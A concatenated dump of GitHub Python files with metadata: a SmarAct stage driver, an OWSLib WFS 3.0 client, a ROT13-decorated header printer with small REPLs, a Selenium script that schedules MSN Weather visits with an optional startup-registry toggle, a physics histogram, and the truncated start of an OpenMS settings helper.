self.write_channel_argument(channel, 'SST', str(int(sensor_type)))\n self.command_status(raw)\n \n def calibrate_sensor(self, channel:int):\n raw = self.write_channel(channel, 'CS')\n logging.info(\"Calibrating sensors ch{}\".format(channel))\n self.command_status(raw)\n\n def find_reference_mark(self, channel:int, direction:int, hold_time:int = 1000, auto_zero:int = 0):\n if (direction == 0 or direction) == 1 and (auto_zero == 0 or auto_zero == 1) and hold_time > 0:\n raw = self.write_channel_argument(channel, 'FRM', \"{},{},{}\".format(int(direction), int(hold_time), int(auto_zero)))\n logging.info(\"Find reference mark ch{}\".format(channel))\n self.command_status(raw)\n \n def move_position_absolute(self, channel:int, position: int, hold_time: int = 1000):\n if hold_time > 0:\n raw = self.write_channel_argument(channel, 'MPA', \"{},{}\".format(int(position), int(hold_time)))\n logging.info(\"Move position absolute ch{}: {} nm\".format(channel, position))\n self.command_status(raw)\n \n def move_position_relative(self, channel:int, position: int, hold_time: int = 1000):\n if hold_time > 0:\n raw = self.write_channel_argument(channel, 'MPR', \"{},{}\".format(int(position), int(hold_time)))\n logging.info(\"Move position relative ch{}: {} nm\".format(channel, position))\n self.command_status(raw)\n \n def get_position(self, channel:int, no_log = False):\n raw = self.write_channel(channel, 'GP')\n if raw is not None:\n raw = raw.removeprefix(\"P{},\".format(channel))\n if not no_log:\n logging.info(\"Get position ch{}: {} nm\".format(channel, int(raw)))\n return int(raw)\n \n def get_physical_position_known(self, channel:int):\n raw = self.write_channel(channel, 'GPPK')\n if raw is not None:\n raw = raw.removeprefix(\"PPK{},\".format(channel))\n logging.info(\"Get physical position known ch{}: {}\".format(channel, int(raw)))\n return int(raw)\n \n def get_status(self, channel:int):\n raw = self.write_channel(channel, 'GS')\n if raw is not None:\n raw = raw.removeprefix(\"S{},\".format(channel))\n return str(raw)\n\n def set_position(self, channel:int, position: int):\n if position > 0:\n raw = self.write_channel_argument(channel, 'SP', \"{}\".format(int(position)))\n logging.info(\"Set position ch{}: {}\".format(channel, position))\n self.command_status(raw)\n\n def get_firmware_version(self, channel:int):\n raw = self.write_channel(channel, 'GFV')\n if raw is not None:\n raw = raw.removeprefix(\"FV{},\".format(channel))\n part = raw.partition(',')\n logging.info(\"Get firmware version ch{}: {}\".format(channel, raw))\n return part\n \n def get_serial_number(self, channel:int):\n raw = self.write_channel(channel, 'GSN')\n if raw is not None:\n raw = raw.removeprefix(\"SN{},\".format(channel))\n logging.info(\"Get serial number ch{}: {}\".format(channel, raw))\n return raw\n","repo_name":"slaclab/pyMCS","sub_path":"SmarAct.py","file_name":"SmarAct.py","file_ext":"py","file_size_in_byte":12370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"729072746","text":"import json\nimport logging\n\nfrom urllib.parse import urljoin\n\nfrom owslib import __version__\nfrom owslib.util import http_get\n\nLOGGER = logging.getLogger(__name__)\n\nREQUEST_HEADERS = {\n \"User-Agent\": \"OWSLib {} (https://geopython.github.io/OWSLib)\".format(__version__)\n}\n\n\nclass WebFeatureService_3_0_0(object):\n \"\"\"Abstraction for OGC Web Feature Service (WFS) version 3.0\"\"\"\n\n def __init__(self, url, version, json_, timeout=30, headers=None, auth=None):\n \"\"\"\n initializer; implements Requirement 1 (/req/core/root-op)\n\n @type url: string\n @param url: url of WFS root document\n @type json_: string\n @param json_: json object\n @param headers: HTTP headers to send with requests\n @param timeout: time (in seconds) after which requests should timeout\n @param username: service authentication username\n @param password: service authentication password\n @param auth: instance of owslib.util.Authentication\n\n @return: initialized WebFeatureService_3_0_0 object\n \"\"\"\n\n if \"?\" in url:\n self.url, self.url_query_string = url.split(\"?\")\n else:\n self.url = url.rstrip(\"/\") + \"/\"\n self.url_query_string = None\n\n self.version = version\n self.json_ = json_\n self.timeout = timeout\n self.headers = REQUEST_HEADERS\n if headers:\n self.headers = self.headers.update(headers)\n self.auth = auth\n\n if json_ is not None: # static JSON string\n self.links = json.loads(json_)[\"links\"]\n else:\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n self.links = response[\"links\"]\n\n def api(self):\n \"\"\"\n implements Requirement 3 (/req/core/api-definition-op)\n\n @returns: OpenAPI definition object\n \"\"\"\n\n url = None\n\n for l in self.links:\n if l['rel'] == 'service-desc':\n url = l['href']\n\n if url is not None:\n LOGGER.debug('Request: {}'.format(url))\n response = http_get(url, headers=REQUEST_HEADERS, auth=self.auth).json()\n return response\n else:\n msg = 'Did not find service-desc link'\n LOGGER.error(msg)\n raise RuntimeError(msg)\n\n def conformance(self):\n \"\"\"\n implements Requirement 5 (/req/core/conformance-op)\n\n @returns: conformance object\n \"\"\"\n\n url = self._build_url(\"conformance\")\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n return response\n\n def collections(self):\n \"\"\"\n implements Requirement 9 (/req/core/collections-op)\n\n @returns: collections object\n \"\"\"\n\n url = self._build_url(\"collections\")\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n return response[\"collections\"]\n\n def collection(self, collection_id):\n \"\"\"\n implements Requirement 15 (/req/core/sfc-md-op)\n\n @type collection_id: string\n @param collection_id: id of collection\n\n @returns: feature collection metadata\n \"\"\"\n\n path = \"collections/{}\".format(collection_id)\n url = self._build_url(path)\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n return response\n\n def collection_items(self, collection_id, **kwargs):\n \"\"\"\n implements Requirement 17 (/req/core/fc-op)\n\n @type collection_id: string\n @param collection_id: id of collection\n @type bbox: list\n @param bbox: list of minx,miny,maxx,maxy\n @type time: string\n @param time: time extent or time instant\n @type limit: int\n @param limit: limit number of features\n @type startindex: int\n @param startindex: start position of results\n\n @returns: feature results\n \"\"\"\n\n if \"bbox\" in kwargs:\n kwargs[\"bbox\"] = \",\".join(kwargs[\"bbox\"])\n\n path = \"collections/{}/items\".format(collection_id)\n url = self._build_url(path)\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(\n url, headers=self.headers, params=kwargs, auth=self.auth\n ).json()\n return response\n\n def collection_item(self, collection_id, identifier):\n \"\"\"\n implements Requirement 30 (/req/core/f-op)\n\n @type collection_id: string\n @param collection_id: id of collection\n @type identifier: string\n @param identifier: feature identifier\n\n @returns: single feature result\n \"\"\"\n\n path = \"collections/{}/items/{}\".format(collection_id, identifier)\n url = self._build_url(path)\n LOGGER.debug(\"Request: {}\".format(url))\n response = http_get(url, headers=self.headers, auth=self.auth).json()\n return response\n\n def _build_url(self, path=None):\n \"\"\"\n helper function to build a WFS 3.0 URL\n\n @type path: string\n @param path: path of WFS URL\n\n @returns: fully constructed URL path\n \"\"\"\n\n url = self.url\n if self.url_query_string is not None:\n LOGGER.debug(\"base URL has a query string\")\n url = urljoin(url, path)\n url = \"?\".join([url, self.url_query_string])\n else:\n url = urljoin(url, path)\n\n LOGGER.debug(\"URL: {}\".format(url))\n return url\n","repo_name":"chrimerss/CREST-iMAP","sub_path":"python2/lib/python2.7/site-packages/owslib/feature/wfs300.py","file_name":"wfs300.py","file_ext":"py","file_size_in_byte":5605,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"26824092867","text":"### DEFAULT HEADER INCLUDE ###\nyourGodTheCreatorOwner='Png Fgriraf '\nETALS=''\n\nimport codecs,base64,time,os,sys,random,datetime,string,shutil;import __main__ as main\nglobal width,bw,bwinner,bwinner_padding,adjust,hz_t,hz_b,hzt_bw,hzb_bw,vl,vr,clt,crt,clb,crb,spa,spa_inner,idt,LnOpn,LnCtn,LnMgn,LnMgn_R,LnMgn_R_spa,lenOf,LnMgnRAdjust,LnMgnR_spa,nl,addLine,brdTop,crnTop,preTxt,postText,borderBottom\nglobal a,b,c,d,e,f,g,h,j,k,l,m,o,q,r,s,t,u,v,x,y,z #in my code, <4 char vars (except i (and n,w,p) which are Reserved) are typically global and extremely volatile. stuff that gets set a few times and not read often, gets longer names\nglobal one,two,three,four,five,six,seven,eight,nine,ten\none=None;two=3;three='undef';four=3.4; #etc #underhandedness to trick the Unsuspecting Richardi.\nglobal w,p,fibnum,hours,minutes,difference,mTime\nb64=base64;rot13='rot_13';aDecode=codecs.decode;aEncode=codecs.encode\ndef unrot(string):\n return aEncode(string, rot13)\ndef rotten(string):\n return aEncode(string, rot13)\ndef base64dcd(barray):\n w(aDecode(b64.b64decode(barray), 'utf-8'))\ndef base64ncd(string):\n w(base64.b64encode(bytearray(string,'utf-8')).decode('utf-8'))\n#macros\nKbInt=KeyboardInterrupt\nmTime = os.stat(main.__file__).st_mtime\nr2e=unrot;e2r=rotten\nb64dc=base64dcd;b64ec=base64ncd;ncode64=b64ec;dcode64=b64dc\nuni2b64=ncode64;b642uni=dcode64\ns=time.sleep;w=print;p=print;q=input; #for a programmer, I'm a very lazy person\ndef ib():\n r('\\nonq vachg\\n')\ndef bo():\n w('{')\ndef bc():\n w('}')\ndef srt(string):\n w(r2e(string))\nr=srt\n\ndef repl(): #simple read-eval-print loop suite with plenty of functions\n while(1):\n try:\n fr = q(r2e('\\nPubbfr n ERCY: {\\n [E]BG13\\n [O]nfr64\\n [U]rnqre Phfgbzvfre\\n [S]vobanppv Gbbyf\\n ['))\n if fr is 'R' or fr is 'r': bc();r4e()\n elif fr is 'B' or fr is 'b': bc();rB64()\n elif fr is 'H' or fr is 'h': bc();printAttribLn('custom')\n elif fr is 'F' or fr is 'f': bc();rFib()\n except KbInt:bc();break\n except NameError:\n r('\\nshapgvba haqre pbafgehpgvba')\n s(1)\n\ndef r4e():\n try:\n r('\\nRatyvfu <-> Ebg13 Ernq-Riny-Cevag-Ybbc {')\n while(1):\n r(q())\n except KbInt:bc()\n\ndef fib(n=0,nth=None): #fib backend\n fibnum=[0, 1]\n for i in range(2,n):\n fibnum.append(fibnum[i-1]+fibnum[i-2])\n if n is 0:\n return None\n elif nth is not None:\n try:\n w(fibnum[nth-1])\n except IndexError:\n b64dc(b'Y2FuJ3QgcmV0dXJuIHZhbHVlIG91dHNpZGUgbGlzdCBpbmRleCBidWZmZXI=')\n else:w(fibnum)\n\ndef rFib(): #repl fibonacci implementation\n r('Svobanppv ERCY: ergheaf svefg \"a\" svo ahzoref be \"agu\" svo {')\n try:\n while(1):\n inp=q('\\n: ')\n if str(inp[len(inp)-2]+inp[len(inp)-1])=='th':\n try:\n ip=int(inp.split('th')[0])\n fib(ip,ip)\n except ValueError:ib()\n else:\n try:\n inp=int(inp)\n fib(inp)\n except ValueError:ib()\n except KbInt:bc()\n\ndef rB64(): #repl base64 converter\n try:\n while(1):\n inp=q('e[n]code or [d]ecode followed by space then string or bytearray {\\n')\n inp=inp.split(' ')\n if not inp[1]:\n ib()\n elif inp[1]:\n try:\n if inp[0] is 'n':\n b64ec(inp[1])\n elif inp[0] is 'd':\n b64dc(bytearray(inp[1],'utf-8'))\n except IndexError:ib()\n else:\n r('\\nnonq vachg\\n')\n except KbInt:bc()\n\n\n###########################################################\n#############################\n####################\n#############\n########\n######\n####\n### BEGIN HEADER GENERATOR\n##\n#\n\nif ETALS: #were there other contributors?\n AUTHORS=r2e(yourGodTheCreatorOwner) + ', ' + ETALS + ', ' + 'et al.'\nelse:AUTHORS=r2e(yourGodTheCreatorOwner)\n\n##since we're doing centering stuff relative to elements left of them and the far-right margin spacing values _M_U_S_T_!!! BE _E_V_E_N_!!\ndef isEven(n):\n n=int(n)\n if n%2 is 0:return True\n else:return False\n\ndef toEven(n,rounds=1):\n n=int(n)\n if isEven(n) is False:\n if rounds is 1:\n if isEven(n+1) is True:\n return n+1\n elif rounds is -1:\n if isEven(n-1) is True:\n return n-1\n else:\n if isEven(n+1) is True:\n return n+1\n elif isEven(n) is True:return n\n else:raise Exception('MathError','format parameters must be even!')\n\n#get how long ago the file was modified\ndef calcModDiff():\n difference = time.time() - mTime\n minutes = int(difference % 3600 / 60)\n hours = int(difference // 3600)\n days = hours // 24\n weeks = days // 7\n months = days // 30\n years = months // 12\n if hours + minutes is 0:\n return ' (yrff guna n zvahgr ntb)'\n elif years > 5:\n return ' (unys n qrpnqr ntb: png, zneel nyrk!)' # MARRY ALEX!\n elif years > 1:\n return ' ({} lrnef ntb)'.format(years)\n elif years > 0:\n return ' (a lrne ntb)'\n elif months > 1:\n return ' ({} zbaguf ntb)'.format(months)\n elif months > 0:\n return ' (n zbagu ntb)'\n elif weeks > 1:\n return ' ({} jrrxf ntb)'.format(weeks)\n elif weeks > 0:\n return ' ({} jrrx ntb)'.format(weeks)\n elif days > 1:\n return ' ({} qnlf ntb)'.format(days)\n elif days > 0:\n return ' ({} qnl ntb)'.format(days)\n elif hours > 1:\n return ' ({} ubhef ntb)'.format(hours)\n elif hours > 0:\n return ' ({} ubhe ntb)'.format(hours)\n elif minutes > 1:\n return ' ({} zvahgrf ntb)'.format(minutes)\n else:return ' ({} zvahgr ntb)'.format(minutes)\n\n#decide a filename\ndef fName():\n selfFName=os.path.basename(__file__)\n mainFName=os.path.basename(main.__file__)\n if main.__file__ is __file__:\n return selfFName\n else:\n return '{} ( <- {})'.format(mainFName,selfFName)\n\ndef printAttribLn(custom=None):\n\n width = toEven(int(str.split(str.split(str(shutil.get_terminal_size()),'=',1)[1],',',1)[0]))\n\n bw=int(.85*width)\n bwinner=bw-2\n bwinner_padding=bwinner-2\n adjust=1\n\n #texty things to be messed with\n spa=' ' #ONE character!!\n spa_inner=spa*bwinner #inner spaces width\n #indent should be calculated as\n idt=toEven((width-bw)/2,-1)*spa\n\n #boxy things to be messed with:\n #note: some character combinations require different setups here\n # BOX BORDER STYLES: OCTAL 57 = /, 134 = \\, 137 = _, 174 = |,\n hz_t='\\137';hz_b='\\137' # horizontal line char! top+bottom ### IF UNDERSCORE USE CHARCODE=OCT(137)\n hzt_bw = spa+(hz_t*bwinner)\n hzb_bw = hz_b*bwinner\n vl='|';vr='|' #vertical line left/right :: if symmetrical, just set vr to vl\n clt='/';crt='\\\\' #corner:left top and corner:right top :: / and \\\n clb=crt;crb=clt #in the case of \\ and /, the diagonal corners are the same.\n\n \n #Who doesn't love a bit of ASCII art / styling??\n\n\n LnOpn=[r2e('svyranzr:'), r2e('nhguberq ol'), r2e('ba'), r2e('erqvfgevohgnoyr haqre gur')]\n LnCtn=[fName(), AUTHORS, time.strftime(r2e('%q-%z-%L @ %U:%Z:%F HGP'),time.gmtime(mTime)) + r2e(calcModDiff()), r2e('TAH TCYi3 || ')]\n #manage + control the number of margin in spaces between the body text and right vertical rule\n #mathhhhh\n def calcMgn(lnNum):\n return toEven(bwinner-(len(LnOpn[lnNum])+len(LnCtn[lnNum])),-1)//2\n def calcRMgn(lnNum):\n return (0-(1-(toEven(((bwinner-(len(LnOpn[lnNum])+len(LnCtn[lnNum])))//2),-1))))\n def calcLenOf(lnNum):\n return len(LnMgn[lnNum])+len(LnOpn[lnNum])+len(LnCtn[lnNum])+calcRMgn(lnNum)\n def calcRDiff(lnNum):\n return LnMgnR[lnNum] - (lenOf[lnNum] - bwinner)\n def calcRMgnSpa(lnNum):\n return ((LnMgnRAdjust[lnNum])-adjust)\n #they're not lists, they're arrays.\n LnMgn=[calcMgn(0)*spa,calcMgn(1)*spa,calcMgn(2)*spa,calcMgn(3)*spa]\n #fix a right-vertical-rule alignment bug whose existence I don't understand\n LnMgnR=[calcRMgn(0),calcRMgn(1),calcRMgn(2),calcRMgn(3)]\n #test strings lengths' relation to bw to fix another bug\n lenOf=[calcLenOf(0),calcLenOf(1),calcLenOf(2),calcLenOf(3)]\n LnMgnRAdjust=[calcRDiff(0),calcRDiff(1),calcRDiff(2),calcRDiff(3)]\n LnMgnR_spa=[calcRMgnSpa(0)*spa,calcRMgnSpa(1)*spa,calcRMgnSpa(2)*spa,calcRMgnSpa(3)*spa,]\n testLen=[LnMgn[0] + LnOpn[0] + spa + LnCtn[0] + LnMgnR_spa[0],\\\n LnMgn[1] + LnOpn[1] + spa + LnCtn[1] + LnMgnR_spa[1],\\\n LnMgn[2] + LnOpn[2] + spa + LnCtn[2] + LnMgnR_spa[2],\\\n LnMgn[3] + LnOpn[3] + spa + LnCtn[3] + LnMgnR_spa[3]]\n for i in range(0,3):\n if len(testLen[i]) > bwinner:\n LnMgnR_spa[i] = int((toEven(LnMgnRAdjust[i])-adjust)-(len(testLen[i])-bwinner))*str(spa)\n #concatenate strings\n nl='\\n'\n addLine=[idt + vl + LnMgn[0] + LnOpn[0] + spa + LnCtn[0] + LnMgnR_spa[0] + vr + nl,\\\n idt + vl + LnMgn[1] + LnOpn[1] + spa + LnCtn[1] + LnMgnR_spa[1] + vr + nl,\\\n idt + vl + LnMgn[2] + LnOpn[2] + spa + LnCtn[2] + LnMgnR_spa[2] + vr + nl,\\\n idt + vl + LnMgn[3] + LnOpn[3] + spa + LnCtn[3] + LnMgnR_spa[3] + vr + nl]\n brdTop = nl + idt + hzt_bw + nl\n crnTop = idt + clt + spa_inner + crt + nl\n preTxt = idt + vl + spa_inner + vr + nl\n ### ... ###\n postTxt = preTxt\n brdBtm = idt + clb + hzb_bw + crb + nl\n\n w('{}{}{}{}{}{}{}{}{}{}{}{}'.format(brdTop,crnTop,preTxt,addLine[0],preTxt,addLine[1],preTxt,addLine[2],preTxt,addLine[3],postTxt,brdBtm))\n ##end def printAttribLn()\n\ndef header(custom=False,prnt=None):\n if prnt:r('Cevagf n phfgbzvfnoyr urnqre jvgu pnyphyngrq naq nqwhfgnoyr znetvaf, qvzrafvbaf, naq nyvtazragf.')\n elif custom:printAttribLn(custom)\n else:printAttribLn()\n#end def header()\nif main.__file__ is __file__:\n header()\n s(1)\n repl()\nelse:pass\n","repo_name":"catb0t/projects-backup","sub_path":"py/old/encodedHead.py","file_name":"encodedHead.py","file_ext":"py","file_size_in_byte":9738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26008065296","text":"import os\nimport ast\nimport time\nimport random\nimport winreg\nimport threading\nimport pystray\nfrom PIL import Image\nfrom datetime import datetime\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\n\napp_name = \"Visit MSN Weather\"\nsleep = random.uniform(3, 4)\n\ndef visit_msn_weather(task=0, close=True):\n options = webdriver.ChromeOptions()\n options.add_argument(\"--app=https://www.msn.com/en-us/weather/forecast/in-Punjab,Pakistan\")\n options.add_experimental_option(\"excludeSwitches\", [\"enable-automation\"])\n options.add_argument(\"--window-size=1366,768\")\n options.add_argument(\"--window-position=-1366,0\")\n # options.add_argument(\"--user-data-dir=C:/Users/ndmgo/AppData/Local/Google/Chrome/User Data\")\n # options.add_argument(\"--profile-directory=Profile 8\") #user profile option ain't working for some reason\n driver = webdriver.Chrome(options=options)\n wait = WebDriverWait(driver, 60)\n try:\n # Navigate to login page\n driver.get(\"https://www.msn.com/en-us/weather/forecast/in-Punjab,Pakistan\")\n try:\n login_button = wait.until(EC.visibility_of_element_located((By.ID, \"mectrl_main_trigger\")))\n time.sleep(sleep)\n login_button.click()\n email_input = wait.until(EC.visibility_of_element_located((By.NAME, \"loginfmt\")))\n email_input.send_keys(\"ndmgorsi@outlook.com\")\n next_button = wait.until(EC.visibility_of_element_located((By.ID, \"idSIButton9\")))\n time.sleep(sleep)\n next_button.click()\n password_input = wait.until(EC.visibility_of_element_located((By.NAME, \"passwd\")))\n password_input.send_keys(\"microsoft_account_password\")\n\n sign_in_button = wait.until(EC.element_to_be_clickable((By.ID, \"idSIButton9\")))\n time.sleep(sleep)\n sign_in_button.click()\n try:\n stay_signed_in_div = wait.until(EC.visibility_of_element_located((By.XPATH, \"//div[contains(text(),'Stay signed in')]\")))\n checkbox = driver.find_element(By.ID, \"KmsiCheckboxField\")\n if checkbox.is_enabled():\n time.sleep(sleep)\n checkbox.click()\n sign_in_button = wait.until(EC.element_to_be_clickable((By.ID, \"idSIButton9\")))\n time.sleep(sleep)\n sign_in_button.click()\n except TimeoutException:\n pass\n except TimeoutException:\n print(\"Already Logged in\")\n time.sleep(5)\n\n if task == 0:\n time.sleep(5)\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[1]\")\n # try_to_click(wait, By.XPATH, \"//*[@id='WeatherLifeIndexEntry-ScreenWidth-c4']/div/div/div[2]/div[2]/div/a[1]\")\n try_to_click(wait, By.XPATH, \"//ul[@class='cardContainer-E1_2']/li[2]/button\")\n try_to_click(wait, By.XPATH, \"//button[@data-value='hourly']\")\n try_to_click(wait, By.XPATH, \"//*[@id='ForecastHourly']/div/ul/li[1]/button\")\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[2]\")\n time.sleep(5)\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_temp']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-1-g_precip']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-2-g_radar']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-3-g_wind']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-4-g_cloud']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-5-g_humidity']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-6-g_visibility']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-7-g_pressure']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-8-g_dewpoint']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-9-g_air_quality']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_hurricane']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-1-g_wildfire']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-2-g_winter_storm']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-3-g_severe_wea']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-4-g_earthquake']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_ski_resort']\")\n try_to_click(wait, By.XPATH, \"//*[@id='layer-group-0-g_etree']\")\n \n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[4]\")\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[5]\")\n try_to_click(wait, By.XPATH, \"//*[@id='WeatherMonthCalendarSection']/div/div[2]/div/ul/li[2]/a\")\n time.sleep(5)\n try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[8]\")\n\n # try_to_click(wait, By.XPATH, \"//*[@id='overflowBtnId']/button\")\n # try_to_click(wait, By.XPATH, \"//*[@id='pivotsNav']/div/div/a[12]\")\n elif task == 1:\n # try_to_click(wait, By.XPATH, \"//*[@id='root']/div/div/div[3]/div[0]/div[5]/div[1]/div/div[1]/button\")\n close = False\n elif task == 2:\n # try_to_click(wait, By.XPATH, \"//*[@id='root']/div/div/div[3]/div[1]/div[5]/div[1]/div/div[1]/button\")\n close = False\n elif task == 3:\n # try_to_click(wait, By.XPATH, \"//*[@id='root']/div/div/div[3]/div[2]/div[5]/div[1]/div/div[1]/button\")\n close = False\n\n if not close:\n current_handles = driver.window_handles\n WebDriverWait(driver, 60*60).until(lambda d: current_handles != d.window_handles) # wait for 1 hour\n driver.quit()\n return True\n except Exception as e:\n print(f\"An error occurred: {e}\")\n driver.quit()\n\ndef try_to_click(wait, by, value):\n try:\n time.sleep(sleep)\n element = wait.until(EC.element_to_be_clickable((by, value)))\n time.sleep(sleep)\n element.click()\n except Exception as e:\n print(f\"An error occurred: {e}\")\n print(f\"Element with {by} = {value} didn't work\")\n\n\ndef get_all_tasks():\n with open(\"E:/NdmGjr/visit_msn_weather/vars.txt\", \"r\") as file:\n data = file.read().split(\"\\n\")\n stored_date = datetime.strptime(data[4], \"%Y-%m-%d\").date()\n current_date = datetime.now().date()\n tasks = data[:4]\n if current_date > stored_date:\n tasks = [\"False\" for i in range(4)]\n with open(\"E:/NdmGjr/visit_msn_weather/vars.txt\", \"w\") as file:\n file.write(\"\\n\".join(tasks + [current_date.strftime(\"%Y-%m-%d\")]))\n return tasks\n\ndef update_vars(task):\n tasks = get_all_tasks()\n tasks[task] = \"True\"\n current_date = datetime.now().date()\n with open(\"E:/NdmGjr/visit_msn_weather/vars.txt\", \"w\") as file:\n file.write(\"\\n\".join(tasks + [current_date.strftime(\"%Y-%m-%d\")]))\n\ndef right_time(task):\n current_hour = time.localtime().tm_hour\n if task == 0:\n return True\n elif task == 1:\n return 8 <= current_hour < 10\n elif task == 2:\n return 12 <= current_hour < 14\n elif task == 3:\n return 16 <= current_hour < 18\n else:\n return False\n\ndef run_scheduler(stop_event):\n while not stop_event.is_set():\n tasks = [ast.literal_eval(x) for x in get_all_tasks()]\n for i, task in enumerate(tasks):\n if not task and right_time(i):\n if visit_msn_weather(i):\n update_vars(i)\n time.sleep(60*30)\n\n# start the scheduler thread\nstop_event = threading.Event()\nscheduler_thread = threading.Thread(target=run_scheduler, args=(stop_event,))\nscheduler_thread.start()\n\n#icon related code\n\ndef on_quit():\n stop_event.set()\n scheduler_thread.join()\n icon.stop()\n\ndef get_startup_status():\n key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, winreg.KEY_ALL_ACCESS)\n try:\n value = winreg.QueryValueEx(key, app_name)[0]\n return True\n except:\n return False\n\ndef startup_toggle(icon, item):\n global startup_status\n startup_status = not item.checked\n key = winreg.OpenKey(winreg.HKEY_CURRENT_USER, r'Software\\Microsoft\\Windows\\CurrentVersion\\Run', 0, winreg.KEY_ALL_ACCESS)\n if startup_status:\n value = os.path.join(os.getcwd(), \"visit_msn_weather.exe\")\n winreg.SetValueEx(key, app_name, 0, winreg.REG_SZ, value)\n else:\n winreg.DeleteValue(key, app_name)\n\nstartup_status = get_startup_status()\n\nimage = Image.open('E:/NdmGjr/visit_msn_weather/icon.png')\nicon = pystray.Icon(app_name, image, app_name)\nicon.menu = pystray.Menu(\n pystray.MenuItem(text=\"MSN Weather\", action=lambda: visit_msn_weather(None, False), default=True),\n pystray.MenuItem(\"Quit\", on_quit),\n pystray.MenuItem(\"Run at startup\", startup_toggle, checked=lambda item: startup_status)\n)\n\nicon.run()\n\n# pyinstaller --name visit_msn_weather main.py --icon=icon.png --noconsole --onefile\n\n","repo_name":"TechNerdXp/visit_msn_weather","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27695512993","text":"from pylab import *\n\nN = 50 \nS = 10000\nm = randint(-1,2,(N,S))\nprint(m[0:5,:])\nn = sum(m, axis=1)\nhist(n)\n\nhold('on')\nsn = linspace(-300,300,10000)\nplot(sn,exp(-2*sn**2/N), 'r-')\nshow()\n \n","repo_name":"magnusji/ubuntu","sub_path":"Documents/Termodynamics/oblig2/microstates.py","file_name":"microstates.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42499228658","text":"from __future__ import print_function\r\nimport os\r\nimport subprocess\r\nimport fileinput\r\nimport itertools\r\nimport pandas\r\n\r\n\r\n# create dict with entry for each node\r\n# in each entry dataframe as saved in setting folder\r\ndef determine_settings_combos(algorithms, OpenMS_par_dict, out_path):\r\n if not os.path.exists(out_path):\r\n os.makedirs(out_path)\r\n\r\n param_dict_combined = {}\r\n for algorithm in algorithms:\r\n # extract parameters of node to do from config variable\r\n parameters = OpenMS_par_dict[algorithm]\r\n # return dict of combinations of parameters for one node\r\n settings_dict = combine_settings(parameters)\r\n settings_filepath = os.path.join(out_path, algorithm + '_settings.csv')\r\n\r\n # if settings file already exists, combine settings so they won't be done again\r\n if os.path.exists(settings_filepath):\r\n # read in old settings file\r\n df_settings_old = pandas.DataFrame.from_csv(settings_filepath)\r\n # create dataframe from dict and concat old and new\r\n df_settings_new = pandas.DataFrame.from_dict(settings_dict, orient='index')\r\n df_settings_merged = pandas.concat([df_settings_old, df_settings_new])\r\n # read out identifiers not duplicated and subset to those\r\n duplicated = df_settings_merged.loc[:, df_settings_merged.columns != 'Identifier'].duplicated()\r\n non_duplicated = [not x for x in duplicated]\r\n df_settings_merged = df_settings_merged[non_duplicated]\r\n # read out identifiers in df, excluding empty entries\r\n identifier = df_settings_merged.Identifier[[not x for x in df_settings_merged.Identifier.isnull()]].tolist()\r\n # append new identifiers to df column, ex\r\n new_ids = [x for x in range(len(df_settings_merged)) if not x in identifier]\r\n # append new ids to entries where identifier is empty\r\n if len(new_ids) != 0:\r\n new_settings = df_settings_merged.Identifier.isnull()\r\n df_settings_merged.loc[new_settings, 'Identifier'] = new_ids\r\n # turn type of identifiers back to integer\r\n df_settings_merged['Identifier'] = df_settings_merged['Identifier'].astype(int)\r\n df_settings_merged.to_csv(settings_filepath)\r\n # merge new settings df with df of all settings\r\n df_current_settings = pandas.concat([df_settings_new, df_settings_merged])\r\n # select only duplicates of new settings\r\n df_settings = df_current_settings[\r\n df_current_settings.loc[:, df_current_settings.columns != 'Identifier'].duplicated()]\r\n df_settings['Identifier'] = df_settings['Identifier'].astype(int)\r\n\r\n # save settings as df to csv with identifiers assigned\r\n else:\r\n df_settings = pandas.DataFrame.from_dict(settings_dict, orient='index')\r\n df_settings['Identifier'] = range(len(df_settings))\r\n df_settings.to_csv(settings_filepath)\r\n\r\n # add df for single node to dict\r\n param_dict_combined[algorithm] = df_settings\r\n return param_dict_combined\r\n\r\n\r\n# return dict of combinations of parameters for one node\r\ndef 